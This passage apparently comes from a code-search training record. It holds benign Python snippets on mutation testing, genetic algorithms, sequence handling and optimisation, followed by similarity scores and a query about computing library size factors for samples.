in VCF. Please filter or refactor these.\")\n\n return Variant(v.pos, v.ref, v.samples[0].alleles[cpy], op, op_len)", "def mutation_sample_dispatch(\n ggrp_target: GenomeGroupTarget,\n ggrp: GenomeGroup,\n test_cmds: List[str],\n config: Config,\n trial_runner: TRIAL_RUNNER_TYPE,\n) -> List[MutantTrialResult]:\n\n # Select the valid mutations for the ggrp_target.loc_idx (sample)\n # Then apply the selected mutations in a random order running the test commands\n # until all mutations are tested or the appropriate break-on action occurs\n results: List[MutantTrialResult] = []\n\n LOGGER.info(\n \"Current target location: %s, %s\", ggrp_target.source_path.name, ggrp_target.loc_idx\n )\n\n op_code = CATEGORIES[ggrp_target.loc_idx.ast_class]\n mutant_operations = CategoryCodeFilter(codes=(op_code,)).valid_mutations\n\n LOGGER.debug(\"MUTATION OPS: %s\", mutant_operations)\n LOGGER.debug(\"MUTATION: %s\", ggrp_target.loc_idx)\n mutant_operations.remove(ggrp_target.loc_idx.op_type)\n\n while mutant_operations:\n # random.choice doesn't support sets, but sample of 1 produces a list with one element\n current_mutation = random.sample(mutant_operations, k=1)[0]\n mutant_operations.remove(current_mutation)\n\n trial_results = trial_runner(\n ggrp[ggrp_target.source_path],\n ggrp_target.loc_idx,\n current_mutation,\n test_cmds,\n config.max_runtime,\n )\n\n results.append(trial_results)\n\n # will log output results to console, and flag to break while loop of operations\n if trial_output_check_break(\n trial_results, config, ggrp_target.source_path, ggrp_target.loc_idx\n ):\n break\n\n return results", "def create_dna_mutation_coin(s):\n p = [P_MUTATE_DNA_00, P_MUTATE_DNA_1, P_MUTATE_DNA_11]\n return BiasedCoin(p[s])", "def get_aa_mut_info(coding_pos, somatic_base, gene_seq):\n # if no mutations return empty result\n if not somatic_base:\n aa_info = {'Reference Codon': [],\n 'Somatic Codon': [],\n 'Codon Pos': [],\n 'Reference Nuc': [],\n 'Reference AA': [],\n 'Somatic AA': []}\n return aa_info\n\n # get codon information into three lists\n ref_codon, codon_pos, pos_in_codon, ref_nuc = zip(*[cutils.pos_to_codon(gene_seq, p)\n for p in coding_pos])\n ref_codon, codon_pos, pos_in_codon, ref_nuc = list(ref_codon), list(codon_pos), list(pos_in_codon), list(ref_nuc)\n\n # construct codons for mutations\n mut_codon = [(list(x) if x != 'Splice_Site' else []) for x in ref_codon]\n for i in range(len(mut_codon)):\n # splice site mutations are not in a codon, so skip such mutations to\n # prevent an error\n if pos_in_codon[i] is not None:\n pc = pos_in_codon[i]\n mut_codon[i][pc] = somatic_base[i]\n mut_codon = [(''.join(x) if x else 'Splice_Site') for x in mut_codon]\n\n # output resulting info\n aa_info = {'Reference Codon': ref_codon,\n 'Somatic Codon': mut_codon,\n 'Codon Pos': codon_pos,\n 'Reference Nuc': ref_nuc,\n 'Reference AA': [(utils.codon_table[r] if (r in utils.codon_table) else None)\n for r in ref_codon],\n 'Somatic AA': [(utils.codon_table[s] if (s in utils.codon_table) else None)\n for s in mut_codon]}\n\n return aa_info", "def mutate(self, number_of_mutations):\n self.mutated.clear()\n mutations = []\n for i in range(number_of_mutations+1):\n old_gene = random.choice(self.genes)\n while old_gene in mutations:\n old_gene = random.choice(self.genes)\n # print(self.max_time)\n old_gene.start_time = random.choice(range(self.max_time - old_gene.finish))\n self.mutated.append(self.genes.index(old_gene))", "def perturbation(solution):\n solution = deepcopy(solution)\n\n chosen_index = randint(0, 
len(solution) - 1)\n\n sub_sequence = solution[chosen_index]\n sub_index = randint(0, len(sub_sequence) - 2)\n sub_sequence[sub_index], sub_sequence[sub_index + 1] = sub_sequence[sub_index + 1], sub_sequence[sub_index]\n\n solution[chosen_index] = sub_sequence\n\n return solution", "def _get_permutated_segments_indices(\n self, randomized: bool, random_state: Optional[np.random.mtrand.RandomState]\n ) -> np.ndarray:\n idx = np.arange(self.dy.size)\n\n if randomized:\n if random_state is None:\n random_state = np.random.RandomState()\n idx = random_state.permutation(idx)\n return idx", "def generateSubSequences(k, ch):\n seq = [\"\".join(c) for c in itertools.product(ch, repeat = k)]\n# discussion about the best way to do this:\n# https://stackoverflow.com/questions/7074051/what-is-the-best-way-to-generate-all-possible-three-letter-strings\n return seq", "def getdviolvar(self,whichsol_,sub_,viol_):\n num_ = None\n if num_ is None:\n num_ = len(sub_)\n elif num_ != len(sub_):\n raise IndexError(\"Inconsistent length of array sub\")\n if sub_ is None:\n raise ValueError(\"Argument sub cannot be None\")\n if sub_ is None:\n raise ValueError(\"Argument sub may not be None\")\n if isinstance(sub_, numpy.ndarray) and sub_.dtype is numpy.dtype(numpy.int32) and sub_.flags.contiguous:\n _sub_copyarray = False\n _sub_tmp = ctypes.cast(sub_.ctypes._as_parameter_,ctypes.POINTER(ctypes.c_int32))\n elif sub_ is not None:\n _sub_copyarray = True\n _sub_np_tmp = numpy.zeros(len(sub_),numpy.dtype(numpy.int32))\n _sub_np_tmp[:] = sub_\n assert _sub_np_tmp.flags.contiguous\n _sub_tmp = ctypes.cast(_sub_np_tmp.ctypes._as_parameter_,ctypes.POINTER(ctypes.c_int32))\n else:\n _sub_copyarray = False\n _sub_tmp = None\n \n _viol_minlength = (num_)\n if (num_) > 0 and viol_ is not None and len(viol_) != (num_):\n raise ValueError(\"Array argument viol is not long enough: Is %d, expected %d\" % (len(viol_),(num_)))\n if isinstance(viol_,numpy.ndarray) and not viol_.flags.writeable:\n raise ValueError(\"Argument viol must be writable\")\n if viol_ is None:\n raise ValueError(\"Argument viol may not be None\")\n if isinstance(viol_, numpy.ndarray) and viol_.dtype is numpy.dtype(numpy.float64) and viol_.flags.contiguous:\n _viol_copyarray = False\n _viol_tmp = ctypes.cast(viol_.ctypes._as_parameter_,ctypes.POINTER(ctypes.c_double))\n elif viol_ is not None:\n _viol_copyarray = True\n _viol_np_tmp = numpy.zeros(len(viol_),numpy.dtype(numpy.float64))\n _viol_np_tmp[:] = viol_\n assert _viol_np_tmp.flags.contiguous\n _viol_tmp = ctypes.cast(_viol_np_tmp.ctypes._as_parameter_,ctypes.POINTER(ctypes.c_double))\n else:\n _viol_copyarray = False\n _viol_tmp = None\n \n res = __library__.MSK_XX_getdviolvar(self.__nativep,whichsol_,num_,_sub_tmp,_viol_tmp)\n if res != 0:\n _,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n if _viol_copyarray:\n viol_[:] = _viol_np_tmp", "def statement(analysis):\n\n #Recovering the subject\n phrase = element_rebuilding.nom_struc_rebuilding(analysis.sn)\n\n if not phrase:\n return []\n\n if analysis.sv:\n #Recovering the end of the sentence\n phrase = element_rebuilding.end_statement_rebuilding(phrase, analysis.sv, analysis.sn, analysis.data_type,\n analysis.aim)\n\n #Recovering subsentences\n for s in analysis.sv[0].vrb_sub_sentence:\n phrase = phrase + sub_process(s)\n\n #Eliminate redundancies if there are\n phrase = other_functions.eliminate_redundancy(phrase)\n\n #If it is a relative form\n if analysis.data_type == RELATIVE or analysis.data_type.startswith(SUBSENTENCE):\n if 
phrase[len(phrase) - 1][len(phrase[len(phrase) - 1]) - 1] != ',':\n phrase[len(phrase) - 1] += ','\n return phrase\n if analysis.data_type == W_QUESTION:\n return phrase + ['?']\n\n #To take of all not useless comma\n while phrase[len(phrase) - 1][len(phrase[len(phrase) - 1]) - 1] == ',':\n phrase[len(phrase) - 1] = phrase[len(phrase) - 1][:len(phrase[len(phrase) - 1]) - 1]\n return phrase + ['.']", "def __getitem__(self, index):\n result = self.sequence[index]\n return SortedSet(result) if isinstance(index, slice) else result", "def test_selection():\n pdb_inp = iotbx.pdb.input(source_info=None, lines=pdb_answer_0)\n ncs_obj_phil = ncs.input(\n hierarchy=pdb_inp.construct_hierarchy())\n nrg = ncs_obj_phil.get_ncs_restraints_group_list()\n\n m1 = list(nrg[0].master_iselection)\n c1 = list(nrg[0].copies[0].iselection)\n c2 = list(nrg[0].copies[1].iselection)\n\n assert len(m1) == len(c1) # renumbering\n assert m1 == [0, 1, 2, 3, 4, 5, 6] # 0, 1, X, 3, X, 5, X | 0, 1, 3\n assert c1 == [7, 8, 9, 10, 11, 12, 13] # 7, 8, 9, X, X, 12, X | 4, 5, 7\n assert c2 == [14, 15, 16, 17, 18, 19, 20] # 14, 15, X, 17, X, 19, X | 8, 9, 11\n\n selection1 = flex.size_t([0,1,5,3,100,101])\n selection2 = flex.size_t([0,1,5,3,7,8,9,12,100,101])\n selection3 = flex.size_t([0,1,5,3,7,8,9,12,14,15,19,17,100,101])\n # gone iseqs for selection3: 2,4,6,10,11,13,16,18,20-99\n\n new_nrg = nrg.select(flex.bool(102, selection1))\n # only atoms in master are selected\n mt = list(new_nrg[0].master_iselection)\n c1t = list(new_nrg[0].copies[0].iselection)\n\n assert mt == []\n assert c1t == []\n\n # atoms selected in both master and copies\n new_nrg = nrg.select(flex.bool(102, selection2))\n # only atoms in master are selected\n mt = list(new_nrg[0].master_iselection)\n c1t = list(new_nrg[0].copies[0].iselection)\n\n assert mt == []\n assert c1t == []\n\n new_nrg = nrg.select(flex.bool(102, selection3))\n # only atoms in master are selected\n mt = list(new_nrg[0].master_iselection)\n c1t = list(new_nrg[0].copies[0].iselection)\n c2t = list(new_nrg[0].copies[1].iselection)\n\n assert mt == [0, 1, 3], list(mt)\n assert c1t == [4, 5, 7], list(c1t)\n assert c2t == [8, 9, 11], list(c2t)", "def choose_from(seq, random_state):\n return seq[random_state.choice(len(seq))]", "def getSubstitutions(self):\n\n\t\tnative_sequence = self.native.sequence()\n\t\tdesign_sequence = self.design.protein.sequence()\n\n\t\tslist = getSubstitutionPositions(native_sequence, design_sequence)\n\t\twordlist = []\n\t\tfor i in slist:\n\t\t\twordlist.append(str(i))\n\t\t\n\t\tdiff_list = string.join(wordlist, \",\")\n\t\tprint diff_list\n\t\tcmd.select(\"desres\", \"(resi \" + diff_list + \")\")\n\t\tcmd.disable(\"desres\")", "def tournament():\n return min(sample(population, sample_size)).chromosome[:]", "def _single_entity_mutated(self, mut_dat, output, variant, item, translocations, fusions, all_except):\n out_dict = {\"names\": lambda x: list(set(x[self.by[self.version]])), #functions for returning specific data types\n \"dataframe\": lambda x: x,\n \"dict\": lambda x: dict(zip(x[self.by[self.version]], x[variant]))}\n\n return out_dict[output](mut_dat)" ]
[ "0.5627289", "0.5542037", "0.5341807", "0.5279429", "0.49878958", "0.4956177", "0.49556637", "0.49054444", "0.4834147", "0.48148525", "0.47234476", "0.4720456", "0.4699101", "0.46727768", "0.4651557", "0.46446463", "0.46332493", "0.46132207", "0.46070266", "0.45562443", "0.45501533", "0.4549319", "0.45486826", "0.45245928", "0.45029423", "0.4472895", "0.4469311", "0.44639558", "0.4462587", "0.4453186", "0.44164962", "0.44076476", "0.44032097", "0.43920684", "0.43746236", "0.43658155", "0.43437478", "0.4342689", "0.4317373", "0.43126765", "0.4312342", "0.4308765", "0.4303543", "0.4302796", "0.43025362", "0.4295105", "0.42904305", "0.42808285", "0.42754513", "0.42746678", "0.42627794", "0.42551792", "0.42454144", "0.42404816", "0.4233842", "0.42320138", "0.4227196", "0.42095444", "0.420354", "0.4203111", "0.42016366", "0.4198436", "0.4185974", "0.4185649", "0.41833794", "0.41781345", "0.41741514", "0.41645306", "0.41624695", "0.41619068", "0.41526464", "0.41500694", "0.4143477", "0.41429663", "0.41422722", "0.41340333", "0.41323426", "0.41291222", "0.41231522", "0.41199476", "0.4115652", "0.4112559", "0.41105294", "0.41074207", "0.4106553", "0.41045243", "0.41000992", "0.4099894", "0.40972", "0.4084683", "0.40835196", "0.40819612", "0.4080385", "0.40798438", "0.4079341", "0.407046", "0.4068681", "0.40650356", "0.4064786", "0.40539712" ]
0.695729
0
Get the expression adjustment parameter for certain samples.
def get_size_factor(samples, lib_file_path): libs = np.loadtxt(lib_file_path, dtype='str', skiprows=1, delimiter='\t') a, b = np.where(samples[:, np.newaxis] == libs[:, 0]) assert np.all(libs[b, 0] == samples) libs = libs[b, :] med = np.median(libs[:, 1].astype('float')) sf = med / libs[:, 1].astype('float') return sf
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def get_parameters(self):\n kwargs = {name: adjuster.get() for name, adjuster in self.adjusters.items()}\n return Parameters(**kwargs)", "def get_parameter_shift(self, idx):\n # get the gradient recipe for this parameter\n recipe = self.grad_recipe[idx]\n # internal multiplier in the Variable\n var_mult = self.params[idx].mult\n\n multiplier = 0.5 if recipe is None else recipe[0]\n multiplier *= var_mult\n shift = np.pi / 2 if recipe is None else recipe[1]\n shift /= var_mult\n return multiplier, shift", "def estimateParameterValues(self, name, rawData):\n observations = np.array([d[0] for d in rawData])\n min = np.nanmin(observations)\n max = np.nanmax(observations)\n delta = max - min\n\n if name == self.parameterNames[0]:\n return oint(min-delta, max+delta, 1000)\n else:\n raise ConfigurationError('Gaussian mean model does not contain a parameter \"{}\".'.format(name))", "def get_measurement_parameter(self, trace: int) -> str:\n if trace not in range(1, 5):\n raise ValueError(\"Trace must be between 1 and 4\")\n\n return self.query(f\"CALC:PAR{trace}:DEF?\")", "def getParam(self):\n return self.__alpha0, self.__alpha1, self.__beta, self.__eta", "def adjust(self):\n if self._adjust is None:\n return \"\"\n return self._adjust", "def estimateParameterValues(self, name, rawData):\n std = np.nanstd(np.ravel(rawData))\n\n if name == self.parameterNames[0]:\n return oint(-1, 1, 200)\n elif name == self.parameterNames[1]:\n return oint(0, 2 * std, 200)\n else:\n raise ConfigurationError('AR1 model does not contain a parameter \"{}\".'.format(name))", "def estimateParameterValues(self, name, rawData):\n std = np.nanstd(np.ravel(rawData))\n\n if name == self.parameterNames[0]:\n return oint(-1, 1, 200)\n elif name == self.parameterNames[1]:\n return oint(0, 2 * std, 200)\n else:\n raise ConfigurationError('AR1 model does not contain a parameter \"{}\".'.format(name))", "def eff_param():\n return r.TF1('photon_eff_param', eff_param_string(), 0, 7)", "def adjustment(self) -> pulumi.Input['GoogleCloudChannelV1RepricingAdjustmentArgs']:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> pulumi.Input['GoogleCloudChannelV1RepricingAdjustmentArgs']:\n return pulumi.get(self, \"adjustment\")", "def get_means_and_scales(self):\n return self.optim.parameters[::2], np.exp(self.optim.parameters[1::2])", "def adjustment_percentage(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment_percentage\")", "def adjustment_percentage(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment_percentage\")", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n 
self.modelBuilder.doVar(\"dAfb[0.,-0.75,0.75]\");\n self.modelBuilder.doVar(\"dA0[0.0, -1.0, 1.0]\");\n #self.modelBuilder.doSet(\"POI\",\"dAfb,dA0\")\n self.modelBuilder.doSet(\"POI\",\"dAfb\")\n self.modelBuilder.factory_('expr::mAfb(\"@0+@1\",eAfb,dAfb)')\n self.modelBuilder.factory_('expr::mA0(\"(@0+@1)\",eA0,dA0)')\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doVar(\"rAfb[1.0,-5.0, 5.0]\");\n self.modelBuilder.doVar(\"rA0[1.0, -5.0, 5.0]\");\n self.modelBuilder.doSet(\"POI\",\"rAfb,rA0\")\n self.modelBuilder.factory_('expr::mAfb(\"@0*@1\",eAfb,rAfb)')\n self.modelBuilder.factory_('expr::mA0(\"(@0*@1)\",eA0,rA0)')\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def get_interp_param(self, key, params, epoch_idx):\n self.debug.start_function('get_interp_param')\n self.debug.variable('interp key', key, formatter='')\n key = self.mcmc_version.param_aliases.get(key, key)\n\n if key in self.mcmc_version.epoch_unique:\n key = f'{key}{epoch_idx + 1}'\n\n self.debug.variable('param key', key, formatter='')\n self.debug.end_function()\n return params[self.param_idxs[key]]", "def getParameter(self, *args):\n return _libsbml.KineticLaw_getParameter(self, *args)", "def get_p_sample(self):\n control = self.p_control * self.n_control\n treatment = self.p_treatment * self.n_treatment\n sample = self.n_control + self.n_treatment\n\n p_sample = (control + treatment) / sample\n\n self.p_sample = p_sample\n\n return p_sample", "def estimateParameterValues(self, name, rawData):\n mean = np.nanmean(np.ravel(rawData))\n std = np.nanstd(np.ravel(rawData))\n\n if name == self.parameterNames[0]:\n return cint(mean-2*std, mean+2*std, 200)\n elif name == self.parameterNames[1]:\n return oint(0, 2 * std, 200)\n else:\n raise ConfigurationError('Gaussian model does not contain a parameter \"{}\".'.format(name))", "def estimateParameterValues(self, name, rawData):\n std = np.nanstd(np.ravel(rawData))\n\n if name == self.parameterNames[0]:\n return oint(0, 2 * std, 1000)\n else:\n raise ConfigurationError('White noise model does not contain a parameter \"{}\".'.format(name))", "def 
update_parameter(self):\n\n if self.testing: # 1. No random choice when testing\n self.epsilon = 0\n else: # 2. Update parameters when learning\n if self.epsilon > 0.:\n self.epsilon -= 0.01\n\n return self.epsilon", "def get_parameters(self):\n # Get the parameters from the parent class\n params = super(NREvalSplit, self).get_parameters()\n\n # Add the LP specific parameters\n params.update({\"samp_frac\": self._samp_frac})\n return params", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doVar(\"mAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"mA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doSet(\"POI\",\"eAfb,mAfb\")\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def get_bounds(self, parameter_name=None):\n if parameter_name is None:\n return [self.get_bounds(p) for p in self.shape_parameters.keys()]\n if parameter_name in self.shape_parameters:\n anchor_settings = list(self.shape_parameters[parameter_name][0].keys())\n return min(anchor_settings), max(anchor_settings)\n elif parameter_name.endswith('_rate_multiplier'):\n for source_name, allow_negative in zip(self.source_name_list,self.source_allowed_negative):\n if parameter_name.startswith(source_name) and allow_negative==True:\n return float('-inf'), float('inf')\n return 0, float('inf')\n else:\n raise InvalidParameter(\"Non-existing parameter %s\" % parameter_name)", "def __getitem__(self, index) -> torch.nn.Parameter:\n return self.parameters[index]", "def likelihood_adjustment(self) -> 'outputs.PreventionInspectTemplateInspectConfigRuleSetRuleHotwordRuleLikelihoodAdjustment':\n return pulumi.get(self, \"likelihood_adjustment\")", "def _get_interpolation(self) :\n \n return self._interpolation", "def get_parameters(self):\n if self.add_bias:\n params = np.concatenate((self.bias, self.W), 0)\n else:\n params = self.W\n return params", "def eff_param_string():\n return '[0] * (1 - [1] * (TMath::Erf(x[0] + [2]) - [1] / [4] * (x[0] - [3] * (pow(x[0], 2) - [3] / [5] * pow(x[0], 3)))))'", "def doParametersOfInterest(self):\n self.modelBuilder.doVar(\"mu[1,0,100]\") ##mu is what we want to return (in string) name[starting_value,min,max] \n self.modelBuilder.doSet(\"POI\",\"mu\")\n self.modelBuilder.factory_('expr::ggH_s_func(\"@0-sqrt(@0)\", mu)')\n self.modelBuilder.factory_( 'expr::ggH_b_func(\"1-sqrt(@0)\", mu)')\n self.modelBuilder.factory_( 'expr::ggH_sbi_func(\"sqrt(@0)\", mu)')", "def _get_new_param(self):\n new_param = sympy.symbols(\"p\"+str(len(self.learning_params)))\n self.learning_params.append(new_param)\n return new_param", "def prior_sample_parameter(self, parameter):\n pass", "def getUpdatedVar(self):\n axisList = self.tabWidget.currentWidget()\n kwargs = self.generateKwArgs()\n updatedVar = axisList.getVar()(**kwargs)\n\n # Get the variable after carrying out the: 
def, sum, avg... operations\n updatedVar = axisList.execAxesOperations(updatedVar)\n\n return updatedVar", "def read_parameter(self, path, default=None, attr=None):\n try:\n if path.startswith('sample'):\n entry = self.entry.nxroot['entry']\n else:\n entry = self.entry\n if attr:\n return entry[path].attrs[attr]\n elif isinstance(entry[path], NXgroup):\n return entry[path]\n else:\n return entry[path].nxvalue\n except NeXusError:\n return default", "def scaling_adjustment(self):\n return self._scaling_adjustment", "def get_extension_param(self):\n if 'frame' in self.disp_parameters['extension']:\n exten = 'all'\n elif 'cube' in self.disp_parameters['extension']:\n exten = 'all'\n elif 'first' in self.disp_parameters['extension']:\n exten = 0\n else:\n try:\n exten = int(self.disp_parameters['extension'])\n except ValueError:\n exten = str(self.disp_parameters['extension']).strip()\n return exten", "def extend_param(self):\n return self._extend_param", "def getInputSpecification(cls):\n inputSpecification = super(Exponential, cls).getInputSpecification()\n inputSpecification.addSub(InputData.parameterInputFactory(\"low\", contentType=InputTypes.FloatType))\n inputSpecification.addSub(InputData.parameterInputFactory(\"lambda\", contentType=InputTypes.FloatType))\n\n return inputSpecification", "def getCalibration(self):\n self.a0 = float(self.getParameter(index=1))\n self.a1 = float(self.getParameter(index=2))\n self.a2 = float(self.getParameter(index=3))\n self.a3 = float(self.getParameter(index=4))\n status = self.getStatus()\n self.wavelength = [ self.a0 + self.a1*x + self.a2*x*x + self.a3*x*x*x \n for x in range(status.pixels)]\n if self.discardTrailingSamples > 0:\n self.wavelength = self.wavelength[:-self.discardTrailingSamples]\n if self.discardLeadingSamples > 0:\n self.wavelength = self.wavelength[self.discardLeadingSamples:]", "def argument_value(self, idx: int):\n return self._values[idx][0]", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Afb[0.6,-0.70,0.70]\");\n self.modelBuilder.doSet(\"POI\",\"Afb\")\n\n # ss templates\n self.modelBuilder.doVar(\"Rdy_mumu_ss[1.0,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rdy_ee_ss[1.0,0.0,10.0]\");\n \n self.modelBuilder.factory_('expr::Rpl(\"(1.+@0)\",Afb)')\n self.modelBuilder.factory_('expr::Rmn(\"(1.-@0)\",Afb)')", "def _get_geometric_augmentation_parameter(self, entry: SupervisedKeypointDBEntry) -> (float, float):\n # Not training\n if not self._is_train:\n return 1.0, 0.0\n\n # For scale\n scale = np.clip(np.random.randn(), -1.0, 1.0) * self._config.aug_scale_factor + 1.0\n\n # For rotate:\n if random.random() < self._config.aug_rot_rate and (not entry.on_boundary):\n rotate_rad = np.clip(np.random.randn(), -2.0, 2.0) * self._config.aug_rot_rad_factor\n else:\n rotate_rad = 0.0\n\n # OK\n return scale, rotate_rad", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Afb[0.6,-0.7,0.7]\");\n self.modelBuilder.doVar(\"A0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doSet(\"POI\",\"Afb,A0\")\n\n # ss templates\n self.modelBuilder.doVar(\"R_ee_os_fakes[0.6,0.0,1.0]\");\n self.modelBuilder.doVar(\"ee16_fakes_norm[1.0, 0.01, 10.]\");\n self.modelBuilder.doVar(\"ee17_fakes_norm[1.0, 0.01, 10.]\");\n self.modelBuilder.doVar(\"ee18_fakes_norm[1.0, 0.01, 10.]\");\n #Remember, cant use spaces in these formulas!\n #self.modelBuilder.options.verbose = 10\n self.modelBuilder.factory_('expr::R_ee16_qcd_os(\"@0*@1\",ee16_fakes_norm,R_ee_os_fakes)')\n 
self.modelBuilder.factory_('expr::R_ee17_qcd_os(\"@0*@1\",ee17_fakes_norm,R_ee_os_fakes)')\n self.modelBuilder.factory_('expr::R_ee18_qcd_os(\"@0*@1\",ee18_fakes_norm,R_ee_os_fakes)')\n self.modelBuilder.factory_('expr::R_ee16_qcd_ss(\"@0*(1.0-@1)\",ee16_fakes_norm,R_ee_os_fakes)')\n self.modelBuilder.factory_('expr::R_ee17_qcd_ss(\"@0*(1.0-@1)\",ee17_fakes_norm,R_ee_os_fakes)')\n self.modelBuilder.factory_('expr::R_ee18_qcd_ss(\"@0*(1.0-@1)\",ee18_fakes_norm,R_ee_os_fakes)')\n \n self.modelBuilder.factory_('expr::Alph(\"2.0*@0/(2.0-@0)\",A0)')\n self.modelBuilder.factory_('expr::Norm(\"3.0/4.0/(2.0+@0)\",Alph)')\n self.modelBuilder.factory_('expr::RAlph(\"@0*@1\",Alph,Norm)')\n self.modelBuilder.factory_('expr::Rpl(\"(@0+@1)\",Norm,Afb)')\n self.modelBuilder.factory_('expr::Rmn(\"(@0-@1)\",Norm,Afb)')", "def getEnergyExpended(self, sample):\r\n if sample is not None:\r\n if len(sample._data) > self.ENERGY_EXPENDED_INDEX:\r\n ee = sample._data[self.ENERGY_EXPENDED_INDEX]\r\n if ee is not None:\r\n return int(ee)\r\n return -1", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Afb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"A0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doSet(\"POI\",\"Afb,A0\")\n\n \n self.modelBuilder.factory_('expr::Alph(\"2.0*@0/(2.0-@0)\",A0)')\n self.modelBuilder.factory_('expr::Norm(\"3.0/4.0/(2.0+@0)\",Alph)')\n self.modelBuilder.factory_('expr::RAlph(\"@0*@1\",Alph,Norm)')\n self.modelBuilder.factory_('expr::Rpl(\"(@0+@1)\",Norm,Afb)')\n self.modelBuilder.factory_('expr::Rmn(\"(@0-@1)\",Norm,Afb)')", "def p(self):\n return hlp.parms(self.y(0))", "def var(self):\n\n return self.rate", "def x_rate(self):\n values = self._interpolate_table(\"x\", derivative_order=1)\n # values += self._corrections(('ortho_eop', iers.ortho_eop, 0, 1e-6),\n # ('pmsdnut2', iers.pmsdnut2, 0, 1e-6))\n return values", "def estimateParameterValues(self, name, rawData):\n if name == self.parameterNames[0]:\n # lower is boundary is zero by definition, upper boundary is chosen as 1.25*(largest observation)\n return oint(0, 1.25*np.nanmax(np.ravel(rawData)), 1000)\n else:\n raise ConfigurationError('Poisson model does not contain a parameter \"{}\".'.format(name))", "def parameters(self):\n temp = list(_flatten(self.params))\n temp_val = [self.check_domain(x.val, True) if isinstance(x, Variable) else x for x in temp]\n return _unflatten(temp_val, self.params)[0]", "def doParametersOfInterest(self):\n self.modelBuilder.doVar(\"mu[0,0,1000]\") ##mu is what we want to return (in string) name[starting_value,min,max] \n self.modelBuilder.doSet(\"POI\",\"mu\")\n self.modelBuilder.factory_('expr::vbfH_s_func(\"@0-sqrt(@0)\", mu)')\n self.modelBuilder.factory_( 'expr::vbfH_b_func(\"1-sqrt(@0)\", mu)')\n self.modelBuilder.factory_( 